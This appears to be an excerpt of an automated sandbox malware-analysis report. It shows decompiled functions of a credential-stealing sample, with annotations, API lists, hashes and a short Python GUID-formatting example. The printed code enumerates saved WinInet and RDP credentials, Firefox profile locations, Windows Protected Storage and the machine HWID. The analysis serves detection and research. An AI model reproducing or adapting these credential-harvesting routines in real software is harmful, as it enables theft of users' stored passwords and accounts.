                _t31 = RegOpenKeyExA(_a4, _a8, 0, _t30, &_v12); // executed
                if(_t31 != 0) {
                    L16:
                    if(_t44 < 2) {
                        _t33 = E0BC08DDA(_t51, _a4, _a8, _a12, _a16, _t44 + 1); // executed
                        _v8 = _t33;
                    }
                    L18:
                    return _v8;
                }
                _push(_t51);
                _t36 = RegQueryValueExA(_v12, _a12, 0, &_v16, 0, &_a20); // executed
                if(_t36 == 0) {
                    _t38 = _a20;
                    if(_t38 != 0 && (_v16 != 1 || _t38 != 1)) {
                        _t40 = E0BC08D51(_t38 + 1);
                        _v8 = _t40;
                        _t41 = RegQueryValueExA(_v12, _a12, 0, 0, _t40, &_a20); // executed
                        if(_t41 == 0) {
                            _t42 = _a16;
                            if(_t42 != 0) {
                                *_t42 = _a20;
                            }
                        } else {
                            E0BC08D3D(_v8);
                            _v8 = 0;
                        }
                    }
                }
                RegCloseKey(_v12); // executed
                _pop(_t51);
                if(_v8 != 0) {
                    goto L18;
                } else {
                    goto L16;
                }
            }


APIs
• RegOpenKeyExA.KERNELBASE(?,?,00000000,00020019,?,HWID,?,HWID,?,?), ref: 0BC08E1A
• RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000), ref: 0BC08E3B
• RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?), ref: 0BC08E69
• RegCloseKey.KERNELBASE(?), ref: 0BC08E8C
Strings
Memory Dump Source
• Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
Yara matches
Similarity
• API ID: QueryValue$CloseOpen
• String ID: HWID
• API String ID: 1586453840-1176364606
• Opcode ID: 870e3b3fb710247a075d9c4e653262ac0e288c039131d3e1e918ae4c128e1574
• Instruction ID: 1d86f805757a1f0b94d19cee7fb871d05d9243cae2a8c73cf16e2f7588149c6d
• Opcode Fuzzy Hash: 870e3b3fb710247a075d9c4e653262ac0e288c039131d3e1e918ae4c128e1574
• Instruction Fuzzy Hash: C2317875921209EFDF11DF85DC41CAFBFB9FBA4640B108526F824921A0DB31CE51DBA0
Uniqueness

Uniqueness Score: 100.00%

C-Code - Quality: 50%
E0BC05178(void* __ebx, void* __edx) {
    signed int _v8;
    char _v48;
    void* _v52;
    void* _v56;
    void* _v60;
    char _v64;
    intOrPtr _v68;
    char _v72;
    char* _v76;
    char _v80;
    void* __edi;
    void* __esi;
    signed int _t37;
    void* _t40;
    intOrPtr* _t43;
    void* _t54;
    void* _t55;
    intOrPtr _t58;
    void* _t62;
    signed int _t64;
    signed int _t65;
    void* _t66;
    intOrPtr _t67;

    _t62 = __edx;
    _t55 = __ebx;
    _t37 = *0xbc10000; // 0xbb40e64e
    _v8 = _t37 ^ _t65;
    _t67 = *0xbc10d6c; // 0x1
    if(_t67 == 0) {
        *0xbc10d6c = 1;
        _t54 = 0;
        do {
            _t2 = _t54 + "abe2869f-9b47-4cd9-a358-c22904dba7f7"; // 0x32656261
            *(_t65 + _t54 - 0x2c) = *_t2 << 2;
            _t54 = _t54 + 1;
        } while (_t54 < 0x25);
    }
    _t40 = &_v56;
    _v52 = 0;
    _v56 = 0;
    __imp__CredEnumerateA("Microsoft_WinInet_*", 0, _t40, &_v52); // executed
    if(_t40 != 0 && _v56 != 0 && _v52 != 0) {
        _t64 = 0;
        if(_v56 > 0) {
            do {
                _t43 = _v52 + _t64 * 4;
                _t58 = *_t43;
                _t59 = *((intOrPtr*)(_t58 + 0x1c));
                _v68 = *((intOrPtr*)(_t58 + 0x1c));
                _v72 = *((intOrPtr*)( *_t43 + 0x18));
                _v76 = &_v48;
                _v80 = 0x4a;
                _v60 = 0;
                _t40 = E0BC01000( &_v72, &_v80, &_v64);
                _t66 = _t66 + 0xc;
                if(_t40 != 0 && _v60 != 0) {
                    E0BC04B5F(_t55, _t59, *((intOrPtr*)( *((intOrPtr*)(_v52 + _t64 * 4)) + 8)), _v60, _v64);
                    _t66 = _t66 + 0xc;
                    _t40 = LocalFree(_v60);
                }
                _t64 = _t64 + 1;
            } while (_t64 < _v56);
        }
        __imp__CredFree(_v52);
    }
    return E0BC09FDC(_t40, _t55, _v8 ^ _t65, _t62, 0, _t64);
}


                                                                                                                                        APIs
                                                                                                                                        • CredEnumerateA.SECHOST(Microsoft_WinInet_*,00000000,?,?), ref: 0BC051C7
                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0BC05249
                                                                                                                                        • CredFree.ADVAPI32(?), ref: 0BC05258
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CredFree$EnumerateLocal
                                                                                                                                        • String ID: J$Microsoft_WinInet_*
                                                                                                                                        • API String ID: 3201283601-3774044737
                                                                                                                                        • Opcode ID: d69a6fc35e6e9c15a0f0d6d8c26aafee67c4e1771f352eb02fbaab0f23e371a5
                                                                                                                                        • Instruction ID: 72c7b61a153ebe64652024164b4c3f099f16877bf7c45d7a36b38c4e7f0f5cc9
                                                                                                                                        • Opcode Fuzzy Hash: d69a6fc35e6e9c15a0f0d6d8c26aafee67c4e1771f352eb02fbaab0f23e371a5
                                                                                                                                        • Instruction Fuzzy Hash: 21314971D21118EFCB11DF98E984A9EBBF9FF48205F11412AE801A7251DB31AA46CF50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 1.34%

                                                                                                                                        C-Code - Quality: 49%
			E0BC09380(void* __eax, void* __ecx) {
				/* __eax is an IStream*. The routine takes the stream's backing HGLOBAL, locks it,
				   hands the bytes plus two freshly allocated work buffers to unresolved helpers,
				   and returns the result in _v8. Helper roles noted below are inferred from the
				   API list of this report, not from resolved symbol names. */
				signed int _v8;        /* return value; cleared on every failure path */
				void* _v12;            /* HGLOBAL backing the stream */
				intOrPtr _v16;         /* work buffer 1, size E0BC0B712() + 0x500000 */
				intOrPtr _v20;         /* work buffer 2, size E0BC0B718(_t58) + 0x100000 */
				intOrPtr _v24;         /* value returned by E0BC089A1 */
				void* __ebx;
				void* __edi;
				void* __esi;
				void** _t23;
				void* _t33;
				intOrPtr _t35;
				intOrPtr _t46;         /* used below but left undeclared by the decompiler */
				void* _t48;
				void* _t52;
				void* _t53;
				void* _t57;
				intOrPtr _t58;

				_v8 = _v8 & 0x00000000;
				_t57 = __eax;
				_t23 =  &_v12;
				/* The decompiler reuses _t23 for the HRESULT, so the ">= 0" test is SUCCEEDED(hr). */
				__imp__GetHGlobalFromStream(__eax, _t23);
				if(_t23 >= 0) {
					_t58 = E0BC089A1(__eax, __ecx);
					_v24 = _t58;
					_t48 = GlobalLock(_v12);          /* pointer to the stream bytes */
					if(_t48 != 0) {
						/* E0BC08D51 wraps LocalAlloc(LMEM_ZEROINIT /* 0x40 */, size); see the subcall entry in the API list. */
						_v16 = E0BC08D51(E0BC0B712() + 0x500000);
						_t33 = E0BC0B718(_t58);
						_t52 = _t58;
						_t35 = E0BC08D51(_t33 + 0x100000);
						/* Arguments are pushed right-to-left, so the call below is E0BC0B726(_t35, _t58, _v16, 0). */
						_push(0);
						_push(_v16);
						_v20 = _t35;
						_push(_t58);
						_push(_t35);
						_v8 = E0BC0B726();
						GlobalUnlock(_v12);
						E0BC08B39(_t57);
						E0BC08A41("FILEPKDX", _t52, _t57, 8);   /* 8-byte literal "FILEPKDX" passed to an unresolved helper */
						_t53 = _t48;
						E0BC08C37(_v24);
						E0BC08C37(_v8);
						if(_v8 == 0) {
							L5:
							_v8 = _v8 & 0x00000000;
						} else {
							_t46 = _v20;
							if(_v20 == 0) {
								goto L5;
							} else {
								_v8 = E0BC08C4D(_t46, _t53, _v8);
							}
						}
						E0BC08D3D(_v16); // executed   (release of the work buffers; assumed counterpart of E0BC08D51)
						E0BC08D3D(_v20); // executed
					}
				}
				E0BC08B27(_t57);
				return _v8;
			}

Statement addresses: 0x0bc09386 .. 0x0bc09468

                                                                                                                                        APIs
                                                                                                                                        • GetHGlobalFromStream.OLE32(?,?,?,?,1.00,?,0BC01491,?,?), ref: 0BC09394
                                                                                                                                        • GlobalLock.KERNEL32 ref: 0BC093B1
                                                                                                                                          • Part of subcall function 0BC08D51: LocalAlloc.KERNELBASE(00000040,?,0BC08E59), ref: 0BC08D57
                                                                                                                                        • GlobalUnlock.KERNEL32(?,?,?,?,?,?,?,0BC01491,?,?), ref: 0BC093FF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Global$AllocFromLocalLockStreamUnlock
                                                                                                                                        • String ID: 1.00$FILEPKDX
                                                                                                                                        • API String ID: 1739492642-730904815
                                                                                                                                        • Opcode ID: 0f06ffca4c0cbfa0779c4b39131626ac92f97d64173bcf456ae523f1be595250
                                                                                                                                        • Instruction ID: 4476fdaa575fd3711c829becc7e6649498839bcf68156374df7c6d6e276ccb8f
                                                                                                                                        • Opcode Fuzzy Hash: 0f06ffca4c0cbfa0779c4b39131626ac92f97d64173bcf456ae523f1be595250
                                                                                                                                        • Instruction Fuzzy Hash: 3A215071931209AFDF01BBE8DC46BAEBBB8EF14351F108566E500A22D1DF748E41AA61
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        C-Code - Quality: 95%
			E0BC06DAB(void* __eflags, intOrPtr _a4) {
				/* Locates Firefox installations through the registry: the subcall at 0BC0689E
				   (RegOpenKeyA / RegEnumKeyExA / StrStrIA, per the API list) walks Software\Mozilla
				   under HKEY_CURRENT_USER (0x80000001) and then HKEY_LOCAL_MACHINE (0x80000002).
				   The current directory is saved before the walk and restored afterwards. */
				signed int _v8;        /* copy of the stack cookie */
				char _v276;            /* 0x104 (MAX_PATH) byte buffer holding the saved current directory */
				intOrPtr _v280;
				intOrPtr _v284;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t12;
				intOrPtr _t14;
				void* _t30;
				signed int _t33;
				void* _t37;            /* saved flags; used below but left undeclared by the decompiler */

				_t37 = __eflags;
				_t12 =  *0xbc10000; // 0xbb40e64e   (global cookie value XORed with the frame pointer: a /GS stack cookie)
				_v8 = _t12 ^ _t33;
				_v280 = _a4;
				_t14 = E0BC08C9C(_a4, _t30, __eflags, 0x24);   /* unresolved helper; 0x24 is the only literal argument */
				 *0xbc10d54 =  *0xbc10d54 & 0x00000000;         /* clears a global before the walk */
				_v284 = _t14;
				GetCurrentDirectoryA(0x104,  &_v276);
				E0BC0689E(_t30, _v280, 0x80000001, "Software\\Mozilla", "Firefox", "\\Mozilla\\Firefox\\"); // executed (HKEY_CURRENT_USER)
				E0BC0689E(_t30, _v280, 0x80000002, "Software\\Mozilla", "Firefox", "\\Mozilla\\Firefox\\"); // executed (HKEY_LOCAL_MACHINE)
				SetCurrentDirectoryA( &_v276);
				/* Tail call chain; the cookie XOR passed to E0BC09FDC matches the pattern of an inlined stack-cookie check (assumed). */
				return E0BC09FDC(E0BC08D0C(_v280, _v284, _t37), _v284, _v8 ^ _t33, _t30, "\\Mozilla\\Firefox\\", "Software\\Mozilla");
			}

Statement addresses: 0x0bc06dab .. 0x0bc06e58

                                                                                                                                        APIs
                                                                                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0BC06DEB
                                                                                                                                          • Part of subcall function 0BC0689E: StrStrIA.SHLWAPI(?,?), ref: 0BC068B0
                                                                                                                                          • Part of subcall function 0BC0689E: LocalAlloc.KERNEL32(00000040,00000880), ref: 0BC06928
                                                                                                                                          • Part of subcall function 0BC0689E: RegOpenKeyA.ADVAPI32(?,?,?), ref: 0BC0693D
                                                                                                                                          • Part of subcall function 0BC0689E: RegEnumKeyExA.KERNELBASE(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0BC069C2
                                                                                                                                          • Part of subcall function 0BC0689E: RegCloseKey.KERNELBASE(?), ref: 0BC069CC
                                                                                                                                        • SetCurrentDirectoryA.KERNEL32(?), ref: 0BC06E33
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CurrentDirectory$AllocCloseEnumLocalOpen
                                                                                                                                        • String ID: Firefox$Software\Mozilla$\Mozilla\Firefox\
                                                                                                                                        • API String ID: 763207988-2631691096
                                                                                                                                        • Opcode ID: 407769736be4fa500f0a68fdb9c77e03fcde370ed41ad380772a68d1c3061b20
                                                                                                                                        • Instruction ID: 1f8bd8cd660376fe6de7833cf288d9d2ed23f0bd410280526613b4dcce76e16c
                                                                                                                                        • Opcode Fuzzy Hash: 407769736be4fa500f0a68fdb9c77e03fcde370ed41ad380772a68d1c3061b20
                                                                                                                                        • Instruction Fuzzy Hash: F211C871D2021CAFCB24EB54DC4BFDA7BB8EB44715F0044E9B609A2280DE709E84CBB0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.05%

                                                                                                                                        C-Code - Quality: 68%
                                                                                                                                        			E0BC073B2(void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                                        				char _v8;
                                                                                                                                        				void* _v12;
                                                                                                                                        				intOrPtr _v16;
                                                                                                                                        				void* __ebx;
                                                                                                                                        				char* _t18;
                                                                                                                                        				void* _t19;
                                                                                                                                        				intOrPtr _t24;
                                                                                                                                        				void* _t35;
                                                                                                                                        				intOrPtr* _t36;
                                                                                                                                        				void* _t37;
                                                                                                                                        
                                                                                                                                        				_t33 = __edx;
                                                                                                                                        				_t34 = _a4;
                                                                                                                                        				_v16 = E0BC08C9C(_a4, __edx, __eflags, 0x45);
                                                                                                                                        				_t18 =  &_v8;
                                                                                                                                        				_v12 = 0;
                                                                                                                                        				_v8 = 0;
                                                                                                                                        				__imp__CredEnumerateA("TERMSRV/*", 0, _t18,  &_v12);
                                                                                                                                        				if(_t18 != 0 && _v8 != 0) {
                                                                                                                                        					_t36 = _v12;
                                                                                                                                        					if(_t36 != 0) {
                                                                                                                                        						while(1) {
                                                                                                                                        							_t24 =  *_t36;
                                                                                                                                        							_t43 = _t24;
                                                                                                                                        							if(_t24 == 0) {
                                                                                                                                        								break;
                                                                                                                                        							}
                                                                                                                                        							E0BC07121(_t34, _t43,  *((intOrPtr*)(_t24 + 0x30)),  *((intOrPtr*)(_t24 + 8)),  *((intOrPtr*)(_t24 + 0x1c)),  *((intOrPtr*)(_t24 + 0x18)));
                                                                                                                                        							_t37 = _t37 + 0x10;
                                                                                                                                        							_t36 = _t36 + 4;
                                                                                                                                        							if(_v8 != 0) {
                                                                                                                                        								continue;
                                                                                                                                        							}
                                                                                                                                        							break;
                                                                                                                                        						}
                                                                                                                                        						__imp__CredFree(_v12);
                                                                                                                                        					}
                                                                                                                                        				}
                                                                                                                                        				_t19 = E0BC091BE(5); // executed
                                                                                                                                        				_t35 = _t19;
                                                                                                                                        				_t45 = _t35;
                                                                                                                                        				if(_t35 != 0) {
                                                                                                                                        					E0BC01FD3(_t33, _t34, _t35, ".rdp", 0xbeef0000, E0BC072B4); // executed
                                                                                                                                        					E0BC08D3D(_t35);
                                                                                                                                        				}
                                                                                                                                        				return E0BC08D0C(_t34, _v16, _t45);
                                                                                                                                        			}

                                                                                                                                        APIs
                                                                                                                                        • CredEnumerateA.ADVAPI32(TERMSRV/*,00000000,?,?), ref: 0BC073E1
                                                                                                                                        • CredFree.ADVAPI32(?), ref: 0BC0741E
                                                                                                                                          • Part of subcall function 0BC07121: StrStrIA.SHLWAPI(?,0BC0D7EC), ref: 0BC0717E
                                                                                                                                          • Part of subcall function 0BC07121: lstrlenA.KERNEL32(TERMSRV//), ref: 0BC0718A
                                                                                                                                          • Part of subcall function 0BC07121: StrStrIA.SHLWAPI(?,TERMSRV//), ref: 0BC07197
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Cred$EnumerateFreelstrlen
                                                                                                                                        • String ID: .rdp$TERMSRV/*
                                                                                                                                        • API String ID: 952440475-1749210922
                                                                                                                                        • Opcode ID: f6b7ec23722a2c863d2566bfc8345b8e75c10a624d4e9822247e6465f638a660
                                                                                                                                        • Instruction ID: fa731445dd27e400aec82dce10f05c08f20b56b64b2fae46139cc23c78b70a63
                                                                                                                                        • Opcode Fuzzy Hash: f6b7ec23722a2c863d2566bfc8345b8e75c10a624d4e9822247e6465f638a660
                                                                                                                                        • Instruction Fuzzy Hash: EF11D672E31104BFDB14AFD88C819AE7BB9EB04200F4540AAE604A7191DE30AE41DF90
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 1.18%

                                                                                                                                        C-Code - Quality: 74%
                                                                                                                                        			E0BC026A0(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, void* __eflags) {
                                                                                                                                        				signed int _v8;
                                                                                                                                        				char _v108;
                                                                                                                                        				signed char _v109;
                                                                                                                                        				signed char _v110;
                                                                                                                                        				signed char _v111;
                                                                                                                                        				signed char _v112;
                                                                                                                                        				signed char _v113;
                                                                                                                                        				signed char _v114;
                                                                                                                                        				signed char _v115;
                                                                                                                                        				signed char _v116;
                                                                                                                                        				signed short _v118;
                                                                                                                                        				signed short _v120;
                                                                                                                                        				char _v124;
                                                                                                                                        				char _v128;
                                                                                                                                        				void* __ebx;
                                                                                                                                        				signed int _t20;
                                                                                                                                        				void* _t22;
                                                                                                                                        				char* _t23;
                                                                                                                                        				void* _t39;
                                                                                                                                        				intOrPtr _t41;
                                                                                                                                        				intOrPtr _t47;
                                                                                                                                        				intOrPtr _t48;
                                                                                                                                        				signed int _t49;
                                                                                                                                        
                                                                                                                                        				_t48 = __esi;
                                                                                                                                        				_t47 = __edi;
                                                                                                                                        				_t46 = __edx;
                                                                                                                                        				_t20 =  *0xbc10000; // 0xbb40e64e
                                                                                                                                        				_v8 = _t20 ^ _t49;
                                                                                                                                        				_t22 = E0BC099B0( &_v128, __edx); // executed
                                                                                                                                        				_t41 = _t39;
                                                                                                                                        				if(_t22 == 0 || _v128 <= 0x14) {
                                                                                                                                        					_t23 =  &_v124;
                                                                                                                                        					__imp__CoCreateGuid(_t23);
                                                                                                                                        					if(_t23 >= 0) {
                                                                                                                                        						wsprintfA( &_v108, "{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}", _v124, _v120 & 0x0000ffff, _v118 & 0x0000ffff, _v116 & 0x000000ff, _v115 & 0x000000ff, _v114 & 0x000000ff, _v113 & 0x000000ff, _v112 & 0x000000ff, _v111 & 0x000000ff, _v110 & 0x000000ff, _v109 & 0x000000ff);
                                                                                                                                        						_t23 = E0BC09812( &_v108, _t46, lstrlenA( &_v108));
                                                                                                                                        						goto L5;
                                                                                                                                        					}
                                                                                                                                        				} else {
                                                                                                                                        					_t23 = E0BC08D3D(_t22);
                                                                                                                                        					L5:
                                                                                                                                        				}
                                                                                                                                        				return E0BC09FDC(_t23, _t41, _v8 ^ _t49, _t46, _t47, _t48);
                                                                                                                                        			}

APIs
  • Part of subcall function 0BC099B0: GetTempPathA.KERNEL32(00000104,?,00000000,?,?,?), ref: 0BC099F9
  • Part of subcall function 0BC099B0: CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?), ref: 0BC09A1A
  • Part of subcall function 0BC099B0: GetHGlobalFromStream.OLE32(?,?,?,?,?), ref: 0BC09A85
  • Part of subcall function 0BC099B0: GlobalLock.KERNEL32 ref: 0BC09A95
  • Part of subcall function 0BC099B0: GlobalUnlock.KERNEL32(?,00000000,00000000,00000000,?,?,?), ref: 0BC09ABC
• CoCreateGuid.OLE32(?), ref: 0BC026D0
• wsprintfA.USER32 ref: 0BC02718
• lstrlenA.KERNEL32(?), ref: 0BC02725
  • Part of subcall function 0BC08D3D: LocalFree.KERNELBASE(00000000,?,0BC08E77,?), ref: 0BC08D49
Strings
• {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}, xrefs: 0BC02712
Memory Dump Source
• Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
Yara matches
Similarity
• API ID: Global$CreateStream$FreeFromGuidLocalLockPathTempUnlocklstrlenwsprintf
• String ID: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
• API String ID: 2318201168-752031952
• Opcode ID: ce783cea41d1cda7f30d286b58ad06aaee902a3cbdf7ccbdf8bde504ff99d731
• Instruction ID: 749b30ad1b945b525fe58c70c667ded8c7ef3ceec68cbe39a755414c7eb902a9
• Opcode Fuzzy Hash: ce783cea41d1cda7f30d286b58ad06aaee902a3cbdf7ccbdf8bde504ff99d731
• Instruction Fuzzy Hash: 101142A1D24258AECF21DBF98C14AFEBBFCAE0D501F100056B565E7082DA28C644DF30
Uniqueness
• Uniqueness Score: 1.25%
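The format string recovered at 0BC02712 is the braced GUID layout: Data1, Data2, Data3, then the two halves of Data4 of the GUID structure that CoCreateGuid fills in. The following is an added example, not code from the sample or from the sandbox report, that reproduces that formatting in Python from a constructed 16-byte GUID and cross-checks it against the uuid module's little-endian reader; the function names and the sample bytes are mine.

```python
"""Reproduce the GUID-to-string step seen above: CoCreateGuid output
(little-endian Data1/Data2/Data3 followed by 8 raw bytes) printed with the
sample's own wsprintfA format string.  Added example, not the sample's code."""
import struct
import uuid

# Exact format string recovered from the dump (xref 0BC02712).
GUID_FMT = "{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}"

# Constructed test vector, laid out as a GUID structure sits in memory on x86:
# Data1 = 0x12345678, Data2 = 0x9ABC, Data3 = 0xDEF0, Data4 = 01 02 .. 08.
SAMPLE_GUID = bytes.fromhex("78563412bc9af0de0102030405060708")


def format_guid_like_sample(raw: bytes) -> str:
    """Format 16 GUID bytes exactly as wsprintfA(GUID_FMT, guid fields) does.

    The eleven conversions in GUID_FMT consume Data1 (u32), Data2 (u16),
    Data3 (u16) and the eight Data4 bytes in order; the first three fields
    are little-endian in memory, which is why the raw bytes look reversed.
    """
    if len(raw) != 16:
        raise ValueError("a GUID is exactly 16 bytes")
    d1, d2, d3, *d4 = struct.unpack("<IHH8B", raw)
    return GUID_FMT % (d1, d2, d3, *d4)


def format_guid_reference(raw: bytes) -> str:
    """Independent check: uuid.UUID(bytes_le=...) reads the same layout,
    so the sample's string must equal the upper-cased braced UUID."""
    return "{%s}" % str(uuid.UUID(bytes_le=raw)).upper()


if __name__ == "__main__":
    s = format_guid_like_sample(SAMPLE_GUID)
    print(s, s == format_guid_reference(SAMPLE_GUID))
```

The output is the registry-style form `{12345678-9ABC-DEF0-0102-030405060708}`. The surrounding subcall (GetTempPathA, CreateStreamOnHGlobal) suggests the string names a per-run temporary object, but the page does not show how it is used, and the format string alone is a weak static indicator because legitimate software prints GUIDs the same way.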

C-Code - Quality: 62%
			E0BC05547(void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v24;
				intOrPtr* _v28;
				void* __ebx;
				struct HINSTANCE__* _t11;
				_Unknown_base(*)()* _t12;
				intOrPtr* _t20;
				void* _t31;
				CHAR* _t32;
				signed int _t38;

				_t33 = _a4;
				_v12 = 0;
				_v8 = E0BC08C9C(_a4, _t31, __eflags, 0x2f);
				// Protected Storage (pstorec.dll, PStoreCreateInstance) is the Windows 2000/XP-era
				// credential store used by old Outlook/Outlook Express and IE auto-complete; it is
				// deprecated since Vista. Resolving it by name at run time keeps it out of the import
				// table and lets the routine fail quietly where the DLL or the export is absent.
				 *((intOrPtr*)((_t38 & 0xfffffff8) - 0xc)) = "Pstorec.dll"; // executed
				_t11 = LoadLibraryA(_t32); // executed
				_t12 = GetProcAddress(_t11, "PStoreCreateInstance");
				_push(0);
				_push(0);
				_push(0);
				_push( &_v12);
				// PStoreCreateInstance(&store, 0, 0, 0): HRESULT >= 0 means an IPStore* was returned (_v28)
				if( *_t12() >= 0) {
					_t44 = _v28;
					if(_v28 != 0) {
						// Walk the store with callback E0BC04C40, then Release() it (IUnknown vtable slot 2)
						E0BC04A80(_t33, _v28, E0BC04C40);
						_t20 = _v28;
						 *((intOrPtr*)( *_t20 + 8))(_t20);
					}
				}
				// These three routines run regardless of whether Protected Storage was reachable
				E0BC0509B(_t33); // executed
				E0BC05178(_t33, _t31); // executed
				E0BC0526C(_t33); // executed
				return E0BC08D0C(_t33, _v24, _t44);
			}
Statement addresses (one per C-code line as listed by the plugin): 0x0bc05553, 0x0bc0555c, 0x0bc05565, 0x0bc05569, 0x0bc05570, 0x0bc0557c, 0x0bc05582, 0x0bc05583, 0x0bc05584, 0x0bc05589, 0x0bc0558e, 0x0bc05590, 0x0bc05594, 0x0bc055a0, 0x0bc055a5, 0x0bc055af, 0x0bc055af, 0x0bc05594, 0x0bc055b3, 0x0bc055bb, 0x0bc055c1, 0x0bc055d8

APIs
• LoadLibraryA.KERNELBASE(0000002F), ref: 0BC05570
• GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 0BC0557C
Note: the single recovered LoadLibraryA argument, 0000002F, appears to be the constant passed to E0BC08C9C just before the call rather than the DLL name (the C-code quality for this function is only 62%); the string the code stores for LoadLibraryA is Pstorec.dll, as the String ID below also records. The 00000000 first argument to GetProcAddress is the module handle as logged, so in this run the load may well have failed, which is expected on any Windows release without a usable Protected Storage.
Strings
Memory Dump Source
• Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
Yara matches
Similarity
• API ID: AddressLibraryLoadProc
• String ID: PStoreCreateInstance$Pstorec.dll
• API String ID: 2574300362-757229339
• Opcode ID: 40118a5a8e938ab17717caa859a52527686956645590603e3dccca7518228f0f
• Instruction ID: 8e173bcb024610d1b755fc9d75534d728755b82121c474cc1b2d9b4f2bc9ec1c
• Opcode Fuzzy Hash: 40118a5a8e938ab17717caa859a52527686956645590603e3dccca7518228f0f
• Instruction Fuzzy Hash: CC01C0716352016BC210BF69AC8986FBBE8DF98A61F00451DF645861C0CE24DA45EAF2
Uniqueness
• Uniqueness Score: 100.00%
                                                                                                                                        			E0BC08A86(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, CHAR* _a4) {
                                                                                                                                        				signed int _v8;
                                                                                                                                        				void _v4104;
                                                                                                                                        				void* _v4108;
                                                                                                                                        				long _v4112;
                                                                                                                                        				void* __edi;
                                                                                                                                        				void* __esi;
                                                                                                                                        				signed int _t14;
                                                                                                                                        				void* _t17;
                                                                                                                                        				int _t20;
                                                                                                                                        				struct _OVERLAPPED* _t22;
                                                                                                                                        				intOrPtr _t30;
                                                                                                                                        				intOrPtr _t31;
                                                                                                                                        				struct _OVERLAPPED* _t32;
                                                                                                                                        				signed int _t34;
                                                                                                                                        
                                                                                                                                        				_t30 = __edx;
                                                                                                                                        				_t27 = __ecx;
                                                                                                                                        				_t25 = __ebx;
                                                                                                                                        				E0BC0B780(0x100c);
                                                                                                                                        				_t14 =  *0xbc10000; // 0xbb40e64e
                                                                                                                                        				_v8 = _t14 ^ _t34;
                                                                                                                                        				_t32 = 0;
                                                                                                                                        				_t31 = __ecx; // executed
                                                                                                                                        				_t17 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 0, 0); // executed
                                                                                                                                        				_v4108 = _t17;
                                                                                                                                        				if(_t17 != 0xffffffff) {
                                                                                                                                        					_push(__ebx);
                                                                                                                                        					while(1) {
                                                                                                                                        						_t20 = ReadFile(_v4108,  &_v4104, 0x1000,  &_v4112, _t32); // executed
                                                                                                                                        						if(_t20 == 0) {
                                                                                                                                        							break;
                                                                                                                                        						}
                                                                                                                                        						E0BC08A41( &_v4104, _t27, _t31, _v4112); // executed
                                                                                                                                        						_pop(_t27);
                                                                                                                                        						if(_v4112 != _t32) {
                                                                                                                                        							continue;
                                                                                                                                        						} else {
                                                                                                                                        							_t32 = 1;
                                                                                                                                        						}
                                                                                                                                        						break;
                                                                                                                                        					}
                                                                                                                                        					FindCloseChangeNotification(_v4108); // executed
                                                                                                                                        					_t22 = _t32;
                                                                                                                                        					_pop(_t25);
                                                                                                                                        				} else {
                                                                                                                                        					_t22 = 0;
                                                                                                                                        				}
                                                                                                                                        				return E0BC09FDC(_t22, _t25, _v8 ^ _t34, _t30, _t31, _t32);
                                                                                                                                        			}

















